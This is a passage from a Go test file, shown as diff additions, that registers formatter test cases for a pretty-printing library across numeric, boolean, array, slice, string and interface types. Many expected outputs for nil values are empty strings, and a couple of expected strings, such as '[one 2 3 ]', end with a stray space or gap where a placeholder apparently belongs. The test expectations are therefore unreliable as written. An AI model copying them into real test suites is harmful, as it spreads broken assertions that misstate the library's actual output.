"(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Max int16. + v2 := int16(32767) + nv2 := (*int16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "int16" + v2s := "32767" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Max int32. + v3 := int32(2147483647) + nv3 := (*int32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "int32" + v3s := "2147483647" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + + // Max int64. + v4 := int64(9223372036854775807) + nv4 := (*int64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "int64" + v4s := "9223372036854775807" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") + + // Max int. + v5 := int(2147483647) + nv5 := (*int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "int" + v5s := "2147483647" + addFormatterTest("%v", v5, v5s) + addFormatterTest("%v", pv5, "<*>"+v5s) + addFormatterTest("%v", &pv5, "<**>"+v5s) + addFormatterTest("%v", nv5, "") + addFormatterTest("%+v", v5, v5s) + addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s) + addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%+v", nv5, "") + addFormatterTest("%#v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s) + addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") + addFormatterTest("%#+v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s) + addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%#+v", nv5, "(*"+v5t+")"+"") +} + +func addUintFormatterTests() { + // Max uint8. + v := uint8(255) + nv := (*uint8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uint8" + vs := "255" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Max uint16. + v2 := uint16(65535) + nv2 := (*uint16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Max uint32. + v3 := uint32(4294967295) + nv3 := (*uint32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "uint32" + v3s := "4294967295" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + + // Max uint64. + v4 := uint64(18446744073709551615) + nv4 := (*uint64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "uint64" + v4s := "18446744073709551615" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") + + // Max uint. + v5 := uint(4294967295) + nv5 := (*uint)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "uint" + v5s := "4294967295" + addFormatterTest("%v", v5, v5s) + addFormatterTest("%v", pv5, "<*>"+v5s) + addFormatterTest("%v", &pv5, "<**>"+v5s) + addFormatterTest("%v", nv5, "") + addFormatterTest("%+v", v5, v5s) + addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s) + addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%+v", nv5, "") + addFormatterTest("%#v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s) + addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") + addFormatterTest("%#+v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s) + addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") +} + +func addBoolFormatterTests() { + // Boolean true. + v := bool(true) + nv := (*bool)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "bool" + vs := "true" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Boolean false. + v2 := bool(false) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "bool" + v2s := "false" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addFloatFormatterTests() { + // Standard float32. + v := float32(3.1415) + nv := (*float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "3.1415" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Standard float64. + v2 := float64(3.1415926) + nv2 := (*float64)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "float64" + v2s := "3.1415926" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") +} + +func addComplexFormatterTests() { + // Standard complex64. + v := complex(float32(6), -2) + nv := (*complex64)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "complex64" + vs := "(6-2i)" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Standard complex128. + v2 := complex(float64(-6), 2) + nv2 := (*complex128)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "complex128" + v2s := "(-6+2i)" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") +} + +func addArrayFormatterTests() { + // Array containing standard ints. + v := [3]int{1, 2, 3} + nv := (*[3]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "[3]int" + vs := "[1 2 3]" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Array containing type with custom formatter on pointer receiver only. + v2 := [3]pstringer{"1", "2", "3"} + nv2 := (*[3]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "[3]spew_test.pstringer" + v2sp := "[stringer 1 stringer 2 stringer 3]" + v2s := v2sp + if spew.UnsafeDisabled { + v2s = "[1 2 3]" + } + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2sp) + addFormatterTest("%v", &pv2, "<**>"+v2sp) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2sp) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2sp) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2sp) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2sp) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2sp) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2sp) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Array containing interfaces. + v3 := [3]interface{}{"one", int(2), uint(3)} + nv3 := (*[3]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[3]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3s := "[one 2 3]" + v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") +} + +func addSliceFormatterTests() { + // Slice containing standard float32 values. + v := []float32{3.14, 6.28, 12.56} + nv := (*[]float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "[]float32" + vs := "[3.14 6.28 12.56]" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Slice containing type with custom formatter on pointer receiver only. + v2 := []pstringer{"1", "2", "3"} + nv2 := (*[]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "[]spew_test.pstringer" + v2s := "[stringer 1 stringer 2 stringer 3]" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Slice containing interfaces. + v3 := []interface{}{"one", int(2), uint(3), nil} + nv3 := (*[]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3t5 := "interface {}" + v3s := "[one 2 3 ]" + v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3 (" + v3t5 + + ")]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Nil slice. + var v4 []int + nv4 := (*[]int)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[]int" + v4s := "" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addStringFormatterTests() { + // Standard string. + v := "test" + nv := (*string)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "string" + vs := "test" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addInterfaceFormatterTests() { + // Nil interface. + var v interface{} + nv := (*interface{})(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "interface {}" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Sub-interface. + v2 := interface{}(uint16(65535)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := 